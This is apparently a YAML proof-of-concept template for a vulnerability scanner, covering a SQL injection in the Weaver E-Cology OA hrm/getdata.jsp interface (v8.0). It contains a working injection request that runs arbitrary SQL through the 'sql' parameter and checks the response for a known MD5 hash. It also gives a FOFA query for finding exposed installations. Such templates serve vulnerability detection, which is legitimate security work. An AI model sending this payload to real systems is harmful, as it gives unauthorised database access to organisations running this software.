product: 泛微E-Cology
vName: 泛微E-Cology hrm_getdata.jsp接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微E-Cology hrm/getdata.jsp接口存在SQL注入
version: 泛微OA E-Cology v8.0
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677268.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) as id
    verify:
      path: ''
      logic: and
      check:
        - status: 200
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and